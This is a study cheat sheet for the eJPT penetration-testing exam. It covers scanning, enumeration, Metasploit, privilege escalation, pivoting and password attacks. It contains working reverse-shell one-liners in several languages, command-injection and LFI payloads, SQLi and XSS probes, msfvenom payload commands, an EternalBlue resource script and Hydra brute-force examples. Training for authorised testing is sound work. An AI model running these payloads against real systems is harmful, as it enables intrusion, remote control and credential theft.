eJPT Exam Helper

Penetration Testing Methodology Checklist

Phase 1: Information Gathering & Scanning

Understand Scope: Identify the target IP range(s) provided.
Host Discovery: Find live hosts within the scope.
```
sudo nmap -sn 
```
Document live IPs.

Port Scanning: Identify open TCP/UDP ports on live hosts.

sudo nmap -sS -p-  # (Full - Slow) OR
sudo nmap -sS --top-ports 1000  # (Faster) OR
sudo nmap -F  # (Top 100)
# Consider -sU for common UDP ports

Document open ports per host.

Phase 2: Enumeration

Service Version Detection: Identify services and versions.
```
sudo nmap -sV -p 
```
Default Scripting (NSE): Run basic Nmap enumeration scripts.
```
sudo nmap -sC -p 
```

Combine Scans: (Efficient start)

sudo nmap -sS -sV -sC -p  -oA nmap_scan_

Service-Specific Enumeration: Web (Gobuster, Nikto, Burp), SMB (enum4linux-ng, smbclient), NFS (showmount), SNMP (snmp-check), DNS (dig axfr), SMTP (smtp-user-enum), FTP (anon login), etc.
Document Findings: Ports, Services, Versions, Shares, Usernames, Directories, Potential Vulns, Interesting Files. **Crucial!**

Phase 3: Vulnerability Assessment & Exploitation

Analyze Enumeration: Correlate versions/configs with known vulnerabilities.
Search for Exploits: `searchsploit`, `msfconsole search`, Exploit-DB.
Check for Misconfigurations: Default/weak creds (Hydra), exposed files, LFI, Command Inj, basic SQLi.
Select & Configure Exploit: Metasploit (`use`, `set RHOSTS/LHOST/payload`) or manual code.
Set Up Listener: `nc -nlvp ` or `msfconsole -> use exploit/multi/handler`.
Execute Exploit: `exploit` / `run` or run manual script.
Gain Initial Access: Obtain shell or Meterpreter session.
Document: Exploit used, options, payload, success details.

Phase 4: Post-Exploitation & Privilege Escalation

Stabilize Shell: Upgrade if needed (Python PTY).
Basic Enumeration (on Target): `whoami`, `id`, `hostname`, `uname -a`/`systeminfo`, `ipconfig`/`ifconfig`, `netstat`/`ss`.
Upload & Run Enumeration Scripts: **LinPEAS / WinPEAS**. Analyze output.
Manual PrivEsc Checks: `sudo -l`, SUID (GTFOBins), Kernel exploits, Writable files/cron, Unquoted service paths, AlwaysInstallElevated, Service perms, Stored creds.
Execute PrivEsc: Use identified vector.
Verify Privileges: `whoami`, `id`.
Document: Enum script results, vector used, commands.

Phase 5: Pivoting & Lateral Movement (If Applicable)

Identify Internal Networks: `ipconfig`/`ifconfig`, `route` on compromised host.
Set Up Pivot: Metasploit `autoroute`, `portfwd`, or `socks_proxy` + `proxychains`.
Scan Internal Network: Use Nmap via pivot.
Repeat Phases 2-4 on internal targets.
Document: Pivot setup, internal findings, lateral movement steps.

Phase 6: Reporting & Flag Capture

Locate Flags/Evidence: Find required proof per exam objectives.
Record Flags/Evidence: Note location and content accurately.
Take Screenshots: Critical steps (exploitation, privesc, flag location).
Review Documentation: Ensure clarity and completeness.

Continuous Tasks

**DOCUMENT EVERYTHING:** Commands, output, findings, reasoning, IPs, ports, services, creds, vulns, exploits, flags. Use structured notes.
**TAKE SCREENSHOTS:** Key moments, success, flags.
**MANAGE TIME:** Don't get stuck. Move on, revisit later.

Nmap Quick Reference

Host Discovery (Ping Scans)

Standard Ping Scan (ICMP, TCP SYN/ACK, ARP): Most common, usually reliable on local networks.
```
sudo nmap -sn  -oN nmap_discovery.txt
# Example: sudo nmap -sn 192.168.1.0/24
```
No Ping (Assume hosts are up): Use if ICMP is blocked, but slower.
```
sudo nmap -Pn ... 
```
Specific Ping Types: `-PE`, `-PP`, `-PM`, `-PS`, `-PA`, `-PU`

Port Scanning

SYN Scan (Stealth - Default & Preferred): Fast, needs root/sudo.
```
sudo nmap -sS 
```
TCP Connect Scan: Slower, more logged, no root needed.
```
nmap -sT 
```

UDP Scan: Slow, less reliable. Combine with `-sV`.

sudo nmap -sU  # Common UDP ports
sudo nmap -sU -p 161,53  # Specific UDP ports

Specific Ports:

nmap -p 80,443,22 
nmap -p U:53,T:21-25,80,443

Top Ports (Faster):

nmap -F  # Top 100
nmap --top-ports 1000  # Top 1000

All Ports (Slow!):
```
nmap -p- 
```

Service, Version & OS Detection

Service Version Detection: Essential.
```
nmap -sV 
```
OS Detection: Needs root/sudo.
```
sudo nmap -O 
```
Aggressive Scan: OS, Version, Default Scripts, Traceroute. Noisy.
```
sudo nmap -A 
```

Nmap Scripting Engine (NSE)

Default Safe Scripts: Great starting point.

nmap -sC  # Equivalent to --script=default

Combine Common Scans: **(Highly Recommended Starting Point)**

sudo nmap -sS -sV -sC -O -p-  -oA nmap_full_scan # (-p- is slow)
sudo nmap -sS -sV -sC -p 1-10000  -oA nmap_common_scan # Faster

Run Specific Script(s):

nmap --script smb-enum-shares.nse 
nmap --script "http-*"

Run Script Category:

nmap --script vuln  # Check known vulns (noisy/risky)

Output Formats

`-oN`: Normal text file.
`-oX`: XML file (for parsing).
`-oG`: Grepable file.
`-oA `: **All formats (Recommended).**

Timing & Performance

Timing Templates: `-T<0-5>` (e.g., `-T4` common).
Minimum Packet Rate: `--min-rate ` (e.g., `--min-rate 500`).

Example Workflow Command

# 1. Discover live hosts
sudo nmap -sn 192.168.1.0/24 -oG discovered_hosts.gnmap | grep "Status: Up" | cut -d' ' -f2 > live_hosts.txt

# 2. Perform detailed scan on live hosts (adjust ports)
sudo nmap -sS -sV -sC -p- -iL live_hosts.txt -oA nmap_detailed_scan -T4 --min-rate 1000

Enumeration Quick Reference

Always correlate findings with Nmap -sV -sC results.

Web (HTTP/HTTPS - Ports 80, 443, etc.)

Directory/File Brute-forcing:

# Gobuster (Common)
gobuster dir -u http://: -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak -t 50 -o gobuster_results.txt

# Feroxbuster (Fast, Recursive)
feroxbuster -u http://: -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak -t 50 -o feroxbuster_results.txt

Web Server Vulnerability Scanner:

nikto -h http://: -output nikto_scan.txt

Manual Inspection: Use Browser Dev Tools (F12) & Burp Suite (Proxy, Repeater). Look for: robots.txt, sitemap.xml, comments, JS files, directory indexing, default creds, headers.

SMB (Ports 139, 445)

Nmap Scripts:

nmap -p 139,445 --script=smb-enum-shares,smb-enum-users,smb-os-discovery

List Shares:

smbclient -L /// -N # Anonymous
smbclient -L /// -U % # Authenticated
enum4linux-ng -A  # Comprehensive

Connect to Share:

smbclient /// -N # Anonymous
smbclient /// -U %
# Commands: ls, cd, get, put, help

NFS (Port 2049)

List Exports:

showmount -e 
nmap -p 111,2049 --script=nfs-ls,nfs-showmount

Mount Export: (Requires `nfs-common`)

sudo mkdir /mnt/nfs_share
sudo mount -t nfs :/ /mnt/nfs_share -o nolock
# Remember to umount /mnt/nfs_share

SNMP (Port 161/UDP)

Check Common Community Strings: (`public`, `private`)

snmp-check -t  -c public
nmap -sU -p 161 --script=snmp-info,snmp-interfaces,snmp-processes

Walk MIB Tree:

snmpwalk -c public -v1  # Try -v2c if needed

DNS (Port 53/UDP/TCP)

Check Zone Transfers (AXFR):

dig axfr @ 
nmap -p 53 --script dns-zone-transfer --script-args dns-zone-transfer.domain=

SMTP (Port 25)

Enumerate Users (VRFY, EXPN, RCPT TO):

nmap -p 25 --script=smtp-commands,smtp-enum-users 
smtp-user-enum -M VRFY -U /path/to/users.txt -t 
# Manual: telnet  25 -> VRFY

FTP (Port 21)

Check Anonymous Login:

nmap -p 21 --script=ftp-anon 
ftp  # User 'anonymous', any password

SSH (Port 22) / Telnet (Port 23)

Identify Version: Nmap `-sV` or `nc `. Check for default creds on Telnet.

Web Application Attack Basics

Burp Suite Basics (Community Edition)

Proxy Setup: Browser (FoxyProxy) -> `127.0.0.1:8080`. Burp Proxy -> `Intercept is on`.
Scope: Target tab -> Right-click host -> `Add to Scope`. Filter `Show only in-scope items`.
Repeater: Send request (`Ctrl+R`). Modify request (URL, headers, body). Click `Send`. Analyze response.
Intruder (Basic Fuzzing):
1. Send request (`Ctrl+I`).
2. Positions tab: `Clear §`. Add `§` around parameter value to fuzz (e.g., `?file=§payload§`).
3. Attack type: `Sniper`.
4. Payloads tab: Type `Simple list`. Add/Paste/Load wordlist.
5. `Start attack`. Analyze results table (Status, Length).

Directory Traversal / Local File Inclusion (LFI)

Identify: Parameters like `?file=`, `?page=`, `?view=`.
Common Payloads:
- Linux: `../../etc/passwd`, `../../../etc/passwd`, `....//....//etc/passwd`
- Windows: `../../windows/win.ini`, `..\\..\\windows\\win.ini`
PHP Wrappers:
- View source: `php://filter/convert.base64-encode/resource=index.php` (Decode Base64)
- Include file: `php://filter/resource=/etc/passwd`

Command Injection

Identify: Parameters used in system commands (`?ip=`, `?host=`, `?cmd=`).
Separators: `;`, `&&`, `|`, `||`, `` ` `` (backticks), `%0a` (newline).
Payload Examples:
- Verify: `; id`, ` | whoami`
- Blind (Check listener): ` && ping -c 3 `, ` | nc `
- Reverse Shell: `; nc -e /bin/bash `, ` | bash -i >& /dev/tcp// 0>&1`

SQL Injection (Basic Detection)

Identify: Login forms, search fields, ID parameters.
Detection Payloads:
- Error-Based: `'`, `"`, `')`, `"))`, `-- -`, `#` (Look for SQL errors).
- Boolean-Based: `=valid' OR '1'='1 -- -`, `=valid' AND '1'='2 -- -` (Observe content changes).
- Time-Based (Blind): `' OR SLEEP(5)-- -`, `); SLEEP(5)-- -` (Observe delay).
Basic Union-Based Concept: `' UNION SELECT null, version(), database() -- -` (Match column count).

Cross-Site Scripting (XSS - Reflected Detection)

Identify: Input reflected in page source/content without sanitization.
Basic Payloads: ``, ``, `">`
Check: Alert box pops up? Script visible in source?

Authentication/Session

Password Attacks: Use Hydra (see Password Attacks sheet). Check default credentials.
Session Cookies: Examine in Burp/DevTools for weak/predictable values.

Metasploit Framework Quick Reference

Core Commands (`msfconsole`)

Start: `msfconsole` (`-q` for quiet)
Search: `search `, `search type:exploit platform:windows smb`, `search cve:2017-0144`
Select Module: `use ` (e.g., `use exploit/windows/smb/ms17_010_eternalblue`)
Info: `info`
Options: `show options`
Set Option: `set ` (e.g., `set RHOSTS `, `set LHOST `)
Set Global Option: `setg LHOST `
Show Payloads: `show payloads`
Set Payload: `set payload ` (e.g., `set payload windows/meterpreter/reverse_tcp`)
Run: `exploit` or `run` (`-j` for background job)
Back: `back`
Exit: `exit`

Handling Sessions (Jobs & Meterpreter)

List Jobs: `jobs -l`
Interact with Session: `sessions -i `
Background Session: `Ctrl+Z` or `background`
Kill Job/Session: `jobs -k `, `sessions -k `

Multi/Handler (Listener)

Setup:

use exploit/multi/handler
set payload 
set LHOST 
set LPORT 
run -j # Run as background job

Meterpreter Basics (Post-Exploitation)

Run these commands after `sessions -i `

System Info: `sysinfo`, `getuid`, `pwd`, `ls`, `cd `
Process Mgmt: `ps`, `migrate `
File System: `upload /local /remote`, `download /remote /local`, `cat /remote/file`, `edit /remote/file`, `search -f *.txt`
Networking: `ipconfig`/`ifconfig`, `route`, `portfwd add -l -p -r `
Get Shell: `shell`
Help: `help`

Automation & Database

Resource Scripts (`.rc` files): Automate setup.

# Example 'exploit.rc':
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit

# Run: resource /path/to/exploit.rc (in msfconsole)
# OR: msfconsole -r /path/to/exploit.rc

Database: Store scan results, hosts, creds.

db_status
db_import /path/to/nmap_scan.xml
hosts
services
creds

Payloads & Reverse Shells Quick Reference

`msfvenom` (Standalone Payload Generator)

Syntax: `msfvenom -p LHOST= LPORT= [Options] -f -o `
Key Options: `-p` (payload), `LHOST`, `LPORT`, `-f` (format: exe, elf, php, aspx, py, bash, raw), `-o` (output), `-a` (arch), `-e` (encoder), `-b` (badchars), `--platform`

Common Examples:

# Windows Reverse TCP Meterpreter EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe

# Linux Reverse TCP Meterpreter ELF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf -o shell

# PHP Reverse TCP (Meterpreter) - Needs  wrapper
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php

# ASPX Reverse TCP (Meterpreter)
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx -o shell.aspx

# Bash Reverse Shell (Raw)
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw -o shell.sh

Netcat Listener

nc -nlvp

Common Reverse Shell One-Liners

Replace `` and ``.

Bash:
```
bash -i >& /dev/tcp// 0>&1
```
Netcat (Traditional `-e`): *Often missing.*
```
nc -e /bin/bash  
```

Netcat (Alternative):

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc   > /tmp/f

Python 2/3:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP: *Requires `exec` or similar.*

php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl:

perl -e 'use Socket;$i="";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PowerShell (Windows):

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Shell Stabilization (Upgrade basic shell)

Python PTY: `python -c 'import pty; pty.spawn("/bin/bash")'` (or `python3`)
Background Shell: `Ctrl+Z`
Terminal Setup: `stty raw -echo; fg`
Reset Terminal: `reset`
Set Terminal Type: `export TERM=xterm`
Set Shell: `export SHELL=bash`

Privilege Escalation Quick Checks

Goal: Find common misconfigs. Run LinPEAS/WinPEAS first!

Linux Privilege Escalation Checks

Automated Script: **(Run first!)**

# Upload linpeas.sh
chmod +x linpeas.sh
./linpeas.sh > linpeas_output.txt # Review output (RED/YELLOW)

Manual Checks:
- OS/Kernel Version: `uname -a`, `cat /etc/os-release` (Searchsploit kernel exploits)
- Sudo Permissions: `sudo -l` (Check GTFOBins for allowed commands)
- SUID/GUID Binaries: `find / -perm -u=s -type f 2>/dev/null`, `find / -perm -g=s -type f 2>/dev/null` (Check GTFOBins)
- Cron Jobs: `ls -la /etc/cron*`, `cat /etc/crontab` (Writable scripts? Jobs running as root?)
- Writable Files/Dirs: `find / -writable -type d 2>/dev/null`, `find /etc/ -writable -type f 2>/dev/null` (Sensitive locations?)
- Processes: `ps aux` (Services running as root with weak perms?)
- User/Group Info: `id`, `whoami`, `cat /etc/passwd`, `cat /etc/group`
- Network: `netstat -tulpn`, `ss -tulpn` (Services listening locally?)
- Mounts/fstab: `mount`, `cat /etc/fstab`
- Home Dir: `ls -la ~`, `cat ~/.bash_history` (History, keys, configs)
Exploit Search: `searchsploit `

Windows Privilege Escalation Checks

Automated Script: **(Run first!)**

# Upload winPEASany.exe
.\winPEASany.exe fast > winpeas_output.txt # Review output
# Consider PowerUp.ps1: Import-Module .\PowerUp.ps1; Invoke-AllChecks

Manual Checks:
- System Info: `systeminfo`, `wmic qfe list brief` (OS Version, Patches - Searchsploit)
- User/Group Info: `whoami /all`, `net user`, `net user `, `net localgroup administrators`
- Network: `ipconfig /all`, `netstat -ano` (+ `tasklist | findstr `)
- Processes/Services: `tasklist /V`, `wmic service list brief`, `sc query state= all` (Weak perms? Known exploits?)
- Unquoted Service Paths: `wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """` (Check path dir perms with `icacls`)
- Scheduled Tasks: `schtasks /query /fo LIST /v` (Running as SYSTEM? Writable scripts?)
- AlwaysInstallElevated: `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`, `reg query HKCU\...` (If both set to 1)
- File/Dir Permissions: `icacls "C:\Path\To\Service.exe"`, `icacls "C:\Program Files\App" /T /C` (Check service bins, configs)
- Stored Credentials: `dir /s *pass* == *.config == unattend.xml == web.config` (SAM/SYSTEM backups, config files - WinPEAS good at this)
Exploit Search: `searchsploit Windows privilege escalation`

Pivoting & Routing Quick Reference

Goal: Access internal networks through a compromised machine (Pivot Host).

Method 1: Metasploit `autoroute` (Route MSF Traffic)

Use Case: Run Metasploit modules against internal targets via Meterpreter.
Steps:
1. Get Meterpreter session on Pivot Host.
2. Identify internal subnet(s) (`ipconfig`/`ifconfig`, `route`).
3. Add route in Meterpreter:
```
run autoroute -s 
# Example: run autoroute -s 10.10.20.0/24
run autoroute -p # Print routes
```
4. Background session (`background`).
5. Use MSF modules setting `RHOSTS` to internal target IP.

Method 2: Metasploit `portfwd` (Forward Specific Ports)

Use Case: Access a single internal port with external tools via Meterpreter.

Steps:

Get Meterpreter session on Pivot Host.

Forward port in Meterpreter:

# Forward Remote Port to Local Kali Port (Common)
# Forward RDP (3389) on 10.10.20.50 to port 4000 on Kali
portfwd add -l 4000 -p 3389 -r 10.10.20.50

# Forward SMB (445) on 10.10.20.60 to port 4455 on Kali
portfwd add -l 4455 -p 445 -r 10.10.20.60

portfwd list # Show forwards
portfwd delete -l  # Delete forward

Connect to the forwarded port on Kali (e.g., `rdesktop 127.0.0.1:4000`).

Method 3: Metasploit SOCKS Proxy (`socks_proxy`)

Use Case: Route traffic from various external tools (browsers, nmap) through Meterpreter via `proxychains`.
Steps:
1. Get Meterpreter session on Pivot Host.
2. Background session (`background`).
3. Start SOCKS proxy module in `msfconsole`:
```
use auxiliary/server/socks_proxy
# set VERSION 4a # Or 5
run -j # Default port 1080
```
4. Configure `proxychains`: Edit `/etc/proxychains4.conf`, add `socks4 127.0.0.1 1080` (or `socks5`).
5. Prefix commands with `proxychains`:
```
proxychains nmap -sT -Pn -F 
proxychains firefox http://
```

Choosing the Method:

`autoroute`: Easiest for MSF modules.
`portfwd`: Best for single port access with external tools.
`socks_proxy`: Most flexible for various external tools.

Password Attacks Quick Reference

Primarily focuses on online brute-forcing with Hydra.

Tool: Hydra

Syntax:
- `hydra -L -P [options] `
- `hydra -l -P [options] `
- `hydra -L -p [options] `
Key Options: `-L` (user file), `-l` (user), `-P` (pass file), `-p` (pass), `-t` (tasks), `-s` (port), `-V` (verbose), `-f`/`-F` (exit on first find), `-o` (output file), `-w` (wait time).

Common Protocols & Examples:

SSH (port 22):

hydra -L users.txt -P pass.txt  ssh -t 4 -V -f

FTP (port 21):

hydra -L users.txt -P pass.txt ftp:// -V

Telnet (port 23):

hydra -L users.txt -P pass.txt telnet://

HTTP POST Form: (Inspect login request)

# Syntax: http-post-form "::"
# Example:
hydra -L users.txt -P pass.txt  http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid Credentials" -V -f

RDP (port 3389):

hydra -L users.txt -P pass.txt rdp:// -V

SMB (port 445):
```
hydra -L users.txt -P pass.txt  smb
```

Wordlists: Check `/usr/share/wordlists/`, `/usr/share/seclists/` (e.g., `rockyou.txt`).
Considerations: Account lockouts, noise, throttling. Offline cracking (John/Hashcat) is faster if hashes are obtained.

Essential OS Commands Quick Reference

Linux Commands (`bash`, `sh`)

Navigation/Listing: `pwd`, `cd`, `ls -la`, `find / -name 2>/dev/null`
File Content: `cat`, `less`, `more`, `head`, `tail`, `grep `
File Manipulation: `touch`, `mkdir`, `rm`, `cp`, `mv`, `echo "t" > f`, `echo "t" >> f`
System/User Info: `uname -a`, `cat /etc/os-release`, `ps aux`, `id`, `whoami`, `groups`, `cat /etc/passwd`, `sudo -l`
Networking: `ifconfig`/`ip a`, `ip route`/`route -n`, `netstat -tulpn`/`ss -tulpn`, `ping`, `wget`, `curl -O`
Permissions: `chmod +x `, `ls -la`
History: `history`, `cat ~/.bash_history`

Windows Commands (`cmd.exe`)

Navigation/Listing: `cd`, `dir`, `dir /a`, `dir /s`
File Content: `type `, `more `, `findstr /i "" `
File Manipulation: `echo. > file`, `echo t > f`, `echo t >> f`, `mkdir`, `del`, `rmdir /s /q`, `copy`, `xcopy /E /I /Y`, `move`
System/User Info: `systeminfo`, `wmic qfe list brief`, `tasklist`, `whoami /all`, `net user`, `net user `, `net localgroup administrators`
Networking: `ipconfig /all`, `route print`, `netstat -ano`, `tasklist | findstr ""`, `ping`, `certutil -urlcache -f `
Permissions: `icacls `
Scheduled Tasks: `schtasks /query /fo LIST /v`
Registry (Query): `reg query /v `, `reg query /s`